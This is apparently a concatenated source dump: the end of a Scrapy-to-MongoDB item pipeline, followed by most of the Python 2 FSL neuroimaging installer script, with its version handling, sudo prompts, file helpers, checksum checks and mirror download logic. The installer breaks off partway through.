raise RuntimeError(f"unexpected spider name {self._spider_name}")
@classmethod
def from_crawler(cls, crawler):
return cls(crawler.spider.name)
def open_spider(self, spider):
self._consume_thread.start()
def close_spider(self, spider):
self._item_queue.put(self._QUEUE_SENTINEL)
self._consume_thread.join()
def process_item(self, item, spider):
        self._item_queue.put(item)
        return item
def _consume_items(self):
while True:
try:
self._consume_all_items_in_queue()
except StopIteration:
break
time.sleep(5)
def _consume_all_items_in_queue(self):
find_sentinel = False
col2items = defaultdict(list)
while not self._item_queue.empty():
item = self._item_queue.get_nowait()
if item == self._QUEUE_SENTINEL:
find_sentinel = True
break
col2items[item.item_name].append(asdict(item))
for colname, items2insert in col2items.items():
collection = self._db_inst.get_collection(colname)
try:
collection.insert_many(items2insert, ordered=False, bypass_document_validation=True)
except pymongo.errors.BulkWriteError as exc:
                # ignore duplicate-key errors (code 11000); report everything else
exc_list = [error for error in exc.details["writeErrors"] if error["code"] != 11000]
if exc_list:
logger.error(f"col {colname}: insertion error {exc_list}")
failed = len(exc_list)
inserted = len(items2insert) - failed
logger.info(f"col {colname}: {inserted} items inserted, {failed} items failed")
else:
logger.info(f"col {colname}: {len(items2insert)} items inserted")
if find_sentinel:
raise StopIteration
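# Illustrative only (not part of the original module): a Scrapy project would enable
# this pipeline via ITEM_PIPELINES in settings.py; the dotted path below is an assumed
# project layout.
#
#   ITEM_PIPELINES = {
#       "myproject.pipelines.MongoPipeline": 300,
#   }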
|
fslinstaller.py
|
#!/usr/bin/python
# Handle unicode encoding
import collections
import csv
import errno
import getpass
import itertools
import locale
import os
import platform
import threading
import time
import shlex
import socket
import sys
import tempfile
import urllib2
import re
import fileinput
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from re import compile, escape, sub
from subprocess import Popen, call, PIPE, STDOUT
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
try:
import json
HAS_JSON = True
except Exception:
HAS_JSON = False
fsli_C_FAILED = 1
fsli_C_OK = 2
fsli_C_SKIP = 4
fsli_C_WARN = 3
CURRENT = 0
UPDATE = 1
UPGRADE = 2
BOURNE_SHELLS = ('sh', 'bash', 'zsh', 'ksh', 'dash', )
C_SHELLS = ('csh', 'tcsh', )
class Version(object):
def __init__(self, version_string):
if ':' in version_string:
version_string = version_string.split(':')[0]
v_vals = version_string.split('.')
for v in v_vals:
if not v.isdigit():
raise ValueError('Bad version string')
self.major = int(v_vals[0])
try:
self.minor = int(v_vals[1])
except IndexError:
self.minor = 0
try:
self.patch = int(v_vals[2])
except IndexError:
self.patch = 0
try:
self.hotfix = int(v_vals[3])
except IndexError:
self.hotfix = 0
def __repr__(self):
return "Version(%s,%s,%s,%s)" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __str__(self):
if self.hotfix == 0:
return "%s.%s.%s" % (self.major, self.minor, self.patch)
else:
return "%s.%s.%s.%s" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __ge__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self > other or self == other:
return True
return False
def __le__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self < other or self == other:
return True
return False
def __cmp__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__lt__(other):
return -1
if self.__gt__(other):
return 1
return 0
def __lt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major < other.major:
return True
if self.major > other.major:
return False
if self.minor < other.minor:
return True
if self.minor > other.minor:
return False
if self.patch < other.patch:
return True
if self.patch > other.patch:
return False
if self.hotfix < other.hotfix:
return True
if self.hotfix > other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __gt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major > other.major:
return True
if self.major < other.major:
return False
if self.minor > other.minor:
return True
if self.minor < other.minor:
return False
if self.patch > other.patch:
return True
if self.patch < other.patch:
return False
if self.hotfix > other.hotfix:
return True
if self.hotfix < other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __eq__(self, other):
if not isinstance(other, Version):
return NotImplemented
if (
self.major == other.major and
self.minor == other.minor and
self.patch == other.patch and
self.hotfix == other.hotfix):
return True
return False
def __ne__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__eq__(other):
return False
return True
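# Illustrative only (not part of the original installer): missing version components
# default to zero, so comparisons behave consistently across version strings of
# different lengths.
def _version_examples():
    assert Version('6.0') == Version('6.0.0')
    assert Version('6.0.1') > Version('6.0')
    assert Version('5.0.11') < Version('6.0.1')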
version = Version('3.1.0')
def memoize(f):
cache = f.cache = {}
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
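# Illustrative only (not part of the original installer): memoize caches results keyed
# on the function and its arguments, so repeated calls with the same arguments reuse
# the first result.
def _memoize_example():
    calls = []
    @memoize
    def square(x):
        calls.append(x)
        return x * x
    assert square(3) == 9
    assert square(3) == 9  # served from the cache
    assert len(calls) == 1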
class InstallError(Exception):
pass
class shell_colours(object):
default = '\033[0m'
rfg_kbg = '\033[91m'
gfg_kbg = '\033[92m'
yfg_kbg = '\033[93m'
mfg_kbg = '\033[95m'
yfg_bbg = '\033[104;93m'
bfg_kbg = '\033[34m'
bold = '\033[1m'
class MsgUser(object):
__debug = False
__quiet = False
@classmethod
def debugOn(cls):
cls.__debug = True
@classmethod
def debugOff(cls):
cls.__debug = False
@classmethod
def quietOn(cls):
cls.__quiet = True
@classmethod
def quietOff(cls):
cls.__quiet = False
@classmethod
def isquiet(cls):
return cls.__quiet
@classmethod
def isdebug(cls):
return cls.__debug
@classmethod
def debug(cls, message, newline=True):
if cls.__debug:
mess = str(message)
if newline:
mess += "\n"
sys.stderr.write(mess)
@classmethod
def message(cls, msg):
if cls.__quiet:
return
print msg
@classmethod
def question(cls, msg):
print msg,
@classmethod
def skipped(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.mfg_kbg, "[Skipped] ", shell_colours.default, msg))
@classmethod
def ok(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.gfg_kbg, "[OK] ", shell_colours.default, msg))
@classmethod
def failed(cls, msg):
print "".join(
(shell_colours.rfg_kbg, "[FAILED] ", shell_colours.default, msg))
@classmethod
def warning(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.bfg_kbg,
shell_colours.bold,
"[Warning]",
shell_colours.default, " ", msg))
class Progress_bar(object):
def __init__(self, x=0, y=0, mx=1, numeric=False, percentage=False):
self.x = x
self.y = y
self.width = 50
self.current = 0
self.max = mx
self.numeric = numeric
self.percentage = percentage
def update(self, reading):
if MsgUser.isquiet():
return
percent = int(round(reading * 100.0 / self.max))
cr = '\r'
if not self.numeric and not self.percentage:
bar = '#' * int(percent)
elif self.numeric:
bar = "/".join(
(str(reading),
str(self.max))) + ' - ' + str(percent) + "%\033[K"
elif self.percentage:
bar = "%s%%" % (percent)
sys.stdout.write(cr)
sys.stdout.write(bar)
sys.stdout.flush()
self.current = percent
if percent == 100:
sys.stdout.write(cr)
if not self.numeric and not self.percentage:
sys.stdout.write(" " * int(percent))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.numeric:
sys.stdout.write(" " * (len(str(self.max))*2 + 8))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.percentage:
sys.stdout.write("100%")
sys.stdout.write(cr)
sys.stdout.flush()
def temp_file_name(mode='r', close=False):
'''Return a name for a temporary file - uses mkstemp to create the file and
returns a tuple (file object, file name).
Opens as read-only unless mode specifies otherwise. If close is set to True
will close the file before returning.
The file object is a fdopen file object so lacks a useable file name.'''
(tmpfile, fname) = tempfile.mkstemp()
file_obj = os.fdopen(tmpfile, mode)
if close:
file_obj.close()
return (file_obj, fname)
class RunCommandError(Exception):
pass
class Spinner(object):
spinner = itertools.cycle(('-', '\\', '|', '/', ))
busy = False
delay = 0.2
def __init__(self, delay=None, quiet=False):
if delay:
try:
self.delay = float(delay)
except ValueError:
pass
self.quiet = quiet
def spin_it(self):
while self.busy:
sys.stdout.write(self.spinner.next())
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
if not self.quiet:
self.busy = True
threading.Thread(target=self.spin_it).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def run_cmd_dropstdout(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=None, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(_, error) = cmd.communicate()
except Exception:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
def run_cmd(command, as_root=False):
'''Run the command and return result.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
else:
sudo_pwd = ''
MsgUser.debug("Will call %s" % (command_line))
try:
my_spinner = Spinner(quiet=MsgUser.isquiet())
my_spinner.start()
cmd = Popen(command_line, stdin=PIPE, stdout=PIPE, stderr=PIPE)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
(output, error) = cmd.communicate()
except Exception:
raise
finally:
my_spinner.stop()
if cmd.returncode:
MsgUser.debug("An error occured (%s, %s)" % (cmd.returncode, error))
raise RunCommandError(error)
MsgUser.debug("Command completed successfully (%s)" % (output))
return output
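# Illustrative only (not part of the original installer): run_cmd returns the command's
# stdout and raises RunCommandError on a non-zero exit status, e.g.
#
#   listing = run_cmd('ls -l /tmp')
#   run_cmd('mkdir -p /opt/fsl', as_root=True)  # asks for the sudo password at most once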
def run_cmd_displayoutput(command, as_root=False):
'''Run the command and display output.'''
command_line = shlex.split(command)
if as_root and os.getuid() != 0:
try:
sudo_pwd = get_sudo_pwd()
except SudoPasswordError:
raise RunCommandError(
"Unable to get valid administrator's password")
command_line.insert(0, '-S')
command_line.insert(0, 'sudo')
MsgUser.debug("Will call %s" % (command_line))
cmd = Popen(
command_line,
stdin=PIPE, stdout=sys.stdout, stderr=sys.stderr)
if sudo_pwd:
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
return_code = cmd.returncode
else:
return_code = call(command_line)
if return_code:
MsgUser.debug("An error occured (%s)" % (return_code))
raise RunCommandError(return_code)
MsgUser.debug("Command completed successfully")
def check_sudo(sudo_pwd):
command_line = ['sudo', '-S', 'true']
MsgUser.debug("Checking sudo password")
cmd = Popen(
command_line,
stdin=PIPE,
stdout=DEVNULL,
stderr=DEVNULL
)
cmd.stdin.write(sudo_pwd + '\n')
cmd.stdin.flush()
cmd.communicate()
if cmd.returncode != 0:
return False
else:
return True
class SudoPasswordError(Exception):
pass
@memoize
def get_sudo_pwd():
'''Get the sudo password from the user'''
MsgUser.message("We require your password to continue...")
attempts = 0
valid = False
while attempts < 3 and not valid:
sudo_pwd = getpass.getpass('password: ')
valid = check_sudo(sudo_pwd)
if not valid:
MsgUser.failed("Incorrect password")
attempts += 1
if not valid:
raise SudoPasswordError()
return sudo_pwd
class DeletionRefused(Exception):
pass
class SafeDeleteError(Exception):
pass
def safe_delete(fs_object, as_root=False):
'''Delete file/folder, becoming root if necessary.
Run some sanity checks on object'''
banned_items = ['/', '/usr', '/usr/bin', '/usr/local', '/bin',
'/sbin', '/opt', '/Library', '/System', '/System/Library',
'/var', '/tmp', '/var/tmp', '/lib', '/lib64', '/Users',
'/home', '/Applications', '/private', '/etc', '/dev',
'/Network', '/net', '/proc']
if os.path.isdir(fs_object):
del_opts = "-rf"
else:
del_opts = '-f'
if fs_object in banned_items:
raise DeletionRefused('Will not delete %s!' % (fs_object))
command_line = " ".join(('rm', del_opts, fs_object))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise SafeDeleteError(str(e))
return result
class MoveError(Exception):
pass
def move(source, target, as_root):
try:
run_cmd_dropstdout(" ".join(('mv', source, target)), as_root)
except RunCommandError, e:
raise MoveError(str(e))
class IsDirectoryError(Exception):
pass
class CopyFileError(Exception):
pass
def copy_file(fname, destination, as_root):
'''Copy a file using sudo if necessary'''
MsgUser.debug("Copying %s to %s (as root? %s)" % (
fname, destination, as_root))
if os.path.isdir(fname):
raise IsDirectoryError('Source (%s) is a directory!' % (fname))
if os.path.isdir(destination):
        # Ensure a terminating slash when copying into a folder
destination = destination.rstrip('/') + "/"
copy_opts = '-p'
fname = '"%s"' % fname
destination = '"%s"' % destination
command_line = " ".join(('cp', copy_opts, fname, destination))
try:
result = run_cmd(command_line, as_root)
except RunCommandError, e:
raise CopyFileError(str(e))
return result
def file_contains(fname, search_for):
'''Equivalent of grep'''
regex = compile(escape(search_for))
found = False
MsgUser.debug("In file_contains.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = True
break
f.close()
return found
def file_contains_1stline(fname, search_for):
'''Equivalent of grep - returns first occurrence'''
regex = compile(escape(search_for))
found = ''
MsgUser.debug("In file_contains_1stline.")
MsgUser.debug("Looking for %s in %s." % (search_for, fname))
f = open(fname, 'r')
for l in f:
if regex.search(l):
found = l
break
f.close()
return found
def line_string_replace(line, search_for, replace_with):
return sub(escape(search_for), escape(replace_with), line)
def line_starts_replace(line, search_for, replace_with):
if line.startswith(search_for):
return replace_with + '\n'
return line
class MoveFileError(Exception):
pass
def move_file(from_file, to_file, requires_root=False):
'''Move a file, using /bin/cp via sudo if requested.
Will work around known bugs in python.'''
if requires_root:
try:
run_cmd_dropstdout(" ".join(
("/bin/cp", from_file, to_file)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to move %s (%s)" % (from_file, str(e)))
os.remove(from_file)
else:
try:
move(from_file, to_file, requires_root)
except OSError, e:
# Handle bug in some python versions on OS X writing to NFS home
# folders, Python tries to preserve file flags but NFS can't do
# this. It fails to catch this error and ends up leaving the file
# in the original and new locations!
if e.errno == 45:
# Check if new file has been created:
if os.path.isfile(to_file):
# Check if original exists
if os.path.isfile(from_file):
# Destroy original and continue
os.remove(from_file)
else:
try:
run_cmd_dropstdout("/bin/cp %s %s" % (
from_file, to_file), as_root=False)
except RunCommandError, e:
MsgUser.debug(e)
raise MoveFileError("Failed to copy from %s (%s)" % (
from_file, str(e)))
os.remove(from_file)
else:
raise
except Exception:
raise
class EditFileError(Exception):
pass
def edit_file(fname, edit_function, search_for, replace_with, requires_root):
'''Search for a simple string in the file given and replace
it with the new text'''
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
line = edit_function(line, search_for, replace_with)
tmpfile.write(line)
src.close()
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
MsgUser.debug(e)
os.remove(tmpfname)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise EditFileError("Failed to edit %s (%s)" % (fname, str(e)))
MsgUser.debug("Modified %s (search %s; replace %s)." % (
fname, search_for, replace_with))
class AddToFileError(Exception):
pass
def add_to_file(fname, add_lines, requires_root):
'''Add lines to end of a file'''
if isinstance(add_lines, basestring):
add_lines = add_lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
src = open(fname)
for line in src:
tmpfile.write(line)
src.close()
tmpfile.write('\n')
for line in add_lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
except MoveFileError, e:
os.remove(tmpfname)
MsgUser.debug(e)
raise AddToFileError("Failed to add to file %s (%s)" % (
fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror + tmpfname + fname)
raise AddToFileError("Failed to add to file %s" % (fname))
MsgUser.debug("Modified %s (added %s)" % (fname, '\n'.join(add_lines)))
class CreateFileError(Exception):
pass
def create_file(fname, lines, requires_root):
'''Create a new file containing lines given'''
if isinstance(lines, basestring):
lines = lines.split('\n')
try:
(tmpfile, tmpfname) = temp_file_name(mode='w')
for line in lines:
tmpfile.write(line)
tmpfile.write('\n')
tmpfile.close()
try:
move_file(tmpfname, fname, requires_root)
        except MoveFileError, e:
            os.remove(tmpfname)
            MsgUser.debug(e)
            raise CreateFileError("Failed to create %s (%s)" % (fname, str(e)))
except IOError, e:
MsgUser.debug(e.strerror)
raise CreateFileError("Failed to create %s" % (fname))
MsgUser.debug("Created %s (added %s)" % (fname, '\n'.join(lines)))
class UnsupportedOs(Exception):
pass
class Host(object):
'''Work out which platform we are running on'''
o_s = platform.system().lower()
arch = platform.machine()
applever = ''
os_type = os.name
supported = True
if o_s == 'darwin':
vendor = 'apple'
version = Version(platform.release())
(applever, _, _) = platform.mac_ver()
glibc = ''
elif o_s == 'linux':
if hasattr(platform, 'linux_distribution'):
# We have a modern python (>2.4)
(vendor, version, _) = platform.linux_distribution(
full_distribution_name=0)
# check if vendor still empty from above call (useful for AWS linux 2 or other rare OSes)
if not vendor:
(vendor, version, _) = platform.linux_distribution(supported_dists=['system'])
else:
(vendor, version, _) = platform.dist()
vendor = vendor.lower()
version = Version(version)
glibc = platform.libc_ver()[1]
else:
supported = False
if arch == 'x86_64':
bits = '64'
elif arch == 'i686':
bits = '32'
elif arch == 'Power Macintosh':
bits = ''
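# The Host attributes above are evaluated once, at class-definition time, and
# the rest of the script reads them directly. A hedged illustration (values
# shown are an example for a 64-bit CentOS 7 machine, not a guaranteed result):
#
#     >>> Host.o_s, Host.vendor, str(Host.version), Host.arch, Host.bits
#     ('linux', 'centos', '7.8.2003', 'x86_64', '64')
#
# Note that Host.bits is only defined for the architectures handled above.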
def is_writeable(location):
'''Check if we can write to the location given'''
writeable = True
try:
tfile = tempfile.NamedTemporaryFile(mode='w+b', dir=location)
tfile.close()
except OSError, e:
if e.errno == errno.EACCES or e.errno == errno.EPERM:
writeable = False
else:
raise
return writeable
def is_writeable_as_root(location):
'''Check if sudo can write to a given location'''
# This requires us to use sudo
(f, fname) = temp_file_name(mode='w')
f.write("FSL")
f.close()
result = False
tmptarget = '/'.join((location, os.path.basename(fname)))
MsgUser.debug(" ".join(('/bin/cp', fname, tmptarget)))
try:
run_cmd_dropstdout(" ".join(('/bin/cp',
fname, tmptarget)), as_root=True)
result = True
os.remove(fname)
run_cmd_dropstdout(" ".join(('/bin/rm',
'-f', tmptarget)), as_root=True)
except RunCommandError, e:
MsgUser.debug(e)
os.remove(fname)
result = False
MsgUser.debug("Writeable as root? %s" % (result))
return result
class ChecksumCalcError(Exception):
pass
def sha256File(filename, bs=1048576):
'''Returns the sha256 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
fhash = hashlib.sha256()
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
except ImportError:
# No SHA256 support on python pre-2.5 so call the OS to do it.
try:
result = run_cmd(" ".join(('sha256sum', '-b', filename)))
return parsesha256sumfile(result)
except RunCommandError, e:
MsgUser.debug("SHA256 calculation error %s" % (str(e)))
raise ChecksumCalcError
def parsesha256sumfile(sha256string):
'''Returns sha256 sum extracted from the output of sha256sum or shasum -a
256 from OS X/Linux platforms'''
(sha256, _) = sha256string.split("*")
return sha256.strip()
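# Illustrative sketch (not part of the installer logic): parsesha256sumfile
# expects the "<hash> *<filename>" form produced by `sha256sum -b`, so a
# hypothetical call would behave roughly like this (the hash is a made-up
# placeholder):
#
#     >>> parsesha256sumfile("d2a9...77f1 *fsl-6.0.4-centos7_64.tar.gz")
#     'd2a9...77f1'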
def md5File(filename, bs=1048576):
'''Returns the MD5 sum of the given file.'''
MsgUser.message("Checking FSL package")
try:
import hashlib
fhash = hashlib.md5()
except ImportError:
import md5
fhash = md5.new()
f = open(filename, 'rb')
pb = Progress_bar(mx=os.path.getsize(filename), percentage=True)
pb.position = 0
data = f.read(bs)
while len(data) == bs:
fhash.update(data)
data = f.read(bs)
pb.position += len(data)
pb.update(pb.position)
fhash.update(data)
f.close()
return fhash.hexdigest()
def file_checksum(filename, chktype='sha256'):
if chktype == 'sha256':
return sha256File(filename)
if chktype == 'md5':
return md5File(filename)
else:
raise ChecksumCalcError('Unrecognised checksum type')
class OpenUrlError(Exception):
pass
def open_url(url, start=0, timeout=20):
socket.setdefaulttimeout(timeout)
MsgUser.debug("Attempting to download %s." % (url))
try:
req = urllib2.Request(url)
if start != 0:
req.headers['Range'] = 'bytes=%s-' % (start)
rf = urllib2.urlopen(req)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (url, e.msg))
raise OpenUrlError("Cannot find file %s on server (%s). "
"Try again later." % (url, e.msg))
except urllib2.URLError, e:
if type(e.reason) != str:
errno = e.reason.args[0]
if len(e.reason.args) > 1:
message = e.reason.args[1]
# give up on trying to identify both the errno and message
else:
message = e.reason.args
if errno == 8:
# Bad host name
MsgUser.debug("%s %s" % (url,
"Unable to find FSL download "
"server in the DNS"))
else:
# Other error
MsgUser.debug("%s %s" % (url, message))
else:
message = str(e.reason)
raise OpenUrlError(
"Cannot find %s (%s). Try again later." % (url, message))
except socket.timeout, e:
MsgUser.debug(e)
raise OpenUrlError("Failed to contact FSL web site. Try again later.")
return rf
class DownloadFileError(Exception):
pass
def download_file(url, localf, timeout=20):
'''Get a file from the url given storing it in the local file specified'''
try:
rf = open_url(url, 0, timeout)
except OpenUrlError, e:
raise DownloadFileError(str(e))
metadata = rf.info()
rf_size = int(metadata.getheaders("Content-Length")[0])
dl_size = 0
block = 16384
x = 0
y = 0
pb = Progress_bar(x, y, rf_size, numeric=True)
for attempt in range(1, 6):
# Attempt download 5 times before giving up
pause = timeout
try:
try:
lf = open(localf, 'ab')
except Exception:
raise DownloadFileError("Failed to create temporary file.")
while True:
buf = rf.read(block)
if not buf:
break
dl_size += len(buf)
lf.write(buf)
pb.update(dl_size)
lf.close()
except (IOError, socket.timeout), e:
MsgUser.debug(e.strerror)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
pause = 0
if dl_size != rf_size:
time.sleep(pause)
MsgUser.message("\nDownload failed re-trying (%s)..." % attempt)
try:
rf = open_url(url, dl_size, timeout)
except OpenUrlError, e:
MsgUser.debug(e)
else:
break
if dl_size != rf_size:
raise DownloadFileError("Failed to download file.")
def build_url_with_protocol(protocol, base, parts):
part_l = [protocol + '://' + base.strip('/')]
part_l.extend([x.strip('/') for x in parts])
return '/'.join(part_l)
def build_url(parts):
part_l = [parts[0].strip('/')]
part_l.extend([x.strip('/') for x in parts[1:]])
return '/'.join(part_l)
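# Minimal usage sketch for the two URL helpers above (the host and path values
# are examples only, not real endpoints used by the installer):
#
#     >>> build_url_with_protocol('https', 'example.com/', ('downloads/', 'file.tar.gz'))
#     'https://example.com/downloads/file.tar.gz'
#     >>> build_url(('https://example.com/', 'downloads/', 'file.tar.gz'))
#     'https://example.com/downloads/file.tar.gz'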
class SiteNotResponding(Exception):
pass
def fastest_mirror(main_mirrors, mirrors_file, timeout=20):
'''Find the fastest mirror for FSL downloads.'''
MsgUser.debug("Calculating fastest mirror")
socket.setdefaulttimeout(timeout)
# Get the mirror list from the url
fastestmirrors = {}
mirrorlist = []
for m in main_mirrors:
MsgUser.debug("Trying %s" % (m))
m_url = '/'.join((m.strip('/'), mirrors_file))
MsgUser.debug("Attempting to open %s" % (m_url))
try:
response = urllib2.urlopen(url=m_url)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (m_url, e.msg))
raise SiteNotResponding(e.msg)
except urllib2.URLError, e:
if isinstance(e.reason, socket.timeout):
MsgUser.debug("Time out trying %s" % (m_url))
raise SiteNotResponding(m)
else:
MsgUser.debug(str(e.reason))
raise SiteNotResponding(str(e.reason))
except socket.timeout, e:
MsgUser.debug(e)
raise SiteNotResponding(str(e))
except Exception, e:
MsgUser.debug("Unhandled exception %s" % (str(e)))
raise
else:
mirrorlist = response.read().strip().split('\n')
MsgUser.debug("Received the following "
"mirror list %s" % (mirrorlist))
continue
if len(mirrorlist) == 0:
raise ServerFailure("Cannot find FSL download servers")
# Check timings from the urls specified
if len(mirrorlist) > 1:
for mirror in mirrorlist:
MsgUser.debug("Trying %s" % (mirror))
then = time.time()
if mirror.startswith('http:'):
serverport = 80
elif mirror.startswith('https:'):
serverport = 443
else:
raise ServerFailure("Unrecognised protocol")
try:
mysock = socket.create_connection((mirror, serverport),
timeout)
pingtime = time.time() - then
mysock.close()
fastestmirrors[pingtime] = mirror
MsgUser.debug("Mirror responded in %s seconds" % (pingtime))
except socket.gaierror, e:
MsgUser.debug("%s can't be resolved" % (e))
except socket.timeout, e:
MsgUser.debug(e)
if len(fastestmirrors) == 0:
raise ServerFailure('Failed to contact any FSL download sites.')
download_url = fastestmirrors[min(fastestmirrors.keys())]
else:
download_url = mirrorlist[0]
return download_url
# Concept:
# Web app creates the following files:
# fslmirrorlist.txt - contains a list of mirror urls
# fslreleases.json - contains the available maps for oses
# mapping to a download url
# {'installer' {
# 'filename': 'fslinstaller.py',
# 'version': '3.0.0',
# 'date': '02/03/2017',
# 'checksum_type', 'sha256',
# 'checksum'},
# 'linux' : {
# 'centos' : {
# 'x86_64': {
# '6': {
# '5.0.9': {
# 'filename': 'fsl-5.0.9-centos6_64.tar.gz',
# 'version': '5.0.9',
# 'date': '01/02/2017',
# 'checksum_type', 'sha256',
# 'checksum': 'abf645662bcf4453235',
# },
# },
# },
# },
# 'rhel' : {'alias': 'centos'}},
#     'darwin' : {
#        'apple' : {
# 'x86_64': {
# '11': {
# ....
# },
# }
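# Hedged sketch of how the manifest above is typically traversed once
# downloaded (the keys shown are illustrative; get_releases() below performs
# the real lookup, including alias handling and version fall-back):
#
#     >>> manifest = get_web_manifest(Settings.mirror)
#     >>> release = manifest['linux']['centos']['x86_64']['7']['6.0.4']
#     >>> release['filename'], release['checksum_type']
#     ('fsl-6.0.4-centos7_64.tar.gz', 'sha256')
#
# Which version keys exist depends entirely on what the server publishes, so
# the exact keys here are assumptions.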
@memoize
def get_web_manifest(download_url, timeout=20):
'''Download the FSL manifest from download_url'''
socket.setdefaulttimeout(timeout)
MsgUser.debug("Looking for manifest at %s." % (download_url))
if HAS_JSON:
MsgUser.debug("Downloading JSON file")
return get_json(download_url + Settings.manifest_json)
else:
MsgUser.debug("Downloading CSV file")
return get_csv_dict(download_url + Settings.manifest_csv)
class GetFslDirError(Exception):
pass
@memoize
def get_fsldir(specified_dir=None, install=False):
'''Find the installed version of FSL using FSLDIR
or location of this script'''
def validate_fsldir(directory):
parent = os.path.dirname(directory)
if parent == directory:
raise GetFslDirError(
"%s appears to be the root folder" %
parent)
if not os.path.exists(parent):
raise GetFslDirError(
"%s doesn't exist" %
parent)
if not os.path.isdir(parent):
raise GetFslDirError(
"%s isn't a directory" %
parent)
if (os.path.exists(directory) and not
os.path.exists(os.path.join(
directory, 'etc', 'fslversion'
))):
raise GetFslDirError(
"%s exists and doesn't appear to be an installed FSL folder" %
directory)
if specified_dir:
if install is False:
if not check_fsl_install(specified_dir):
raise GetFslDirError(
"%s isn't an 'fsl' folder" %
specified_dir)
else:
validate_fsldir(specified_dir)
return specified_dir
try:
fsldir = os.environ['FSLDIR']
try:
validate_fsldir(fsldir)
except GetFslDirError:
# FSLDIR environment variable is incorrect!
MsgUser.warning('FSLDIR environment variable '
'does not point at FSL install, ignoring...')
MsgUser.debug('FSLDIR is set to %s - '
'this folder does not appear to exist' % (fsldir))
fsldir = None
else:
fsldir = fsldir.rstrip('/')
if MsgUser.isquiet():
return fsldir
except KeyError:
# Look to see if I'm in an FSL install
try:
my_parent = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
except NameError:
# Running in debugger - __file__ not set, assume it's cwd
my_parent = os.path.dirname(
os.path.dirname(os.getcwd()))
try:
validate_fsldir(my_parent)
fsldir = my_parent
except GetFslDirError:
fsldir = None
if not install:
MsgUser.debug("asking about %s" % (fsldir))
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'inst_loc', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
                MsgUser.failed(str(e))
return fsldir
else:
if not MsgUser.isquiet():
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'location', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.failed(str(e))
MsgUser.message(
'''Hint - press Enter to select the default value '''
'''given in the square brackets.
If you are specifying a destination folder this needs to either be an existing
FSL install folder or a folder that doesn't already exist.''')
fsldir = None
else:
raise GetFslDirError(
"I can't locate FSL, try again using '-d <FSLDIR>' "
"to specify where to find the FSL install")
return fsldir
def archive_version(archive):
    '''Takes the path to an FSL install file
    and works out what version it is.'''
if not os.path.isfile(archive):
raise NotAFslVersion("%s is not a file" % (archive))
else:
# file is of form: fsl-V.V.V-platform.extensions
(_, vstring, _) = archive.strip().split('-', 2)
try:
return Version(vstring)
except ValueError:
raise NotAFslVersion(
"%s doesn't look like "
"a version number" % (vstring))
class NotAFslVersion(Exception):
pass
class GetInstalledVersionError(Exception):
pass
def get_installed_version(fsldir):
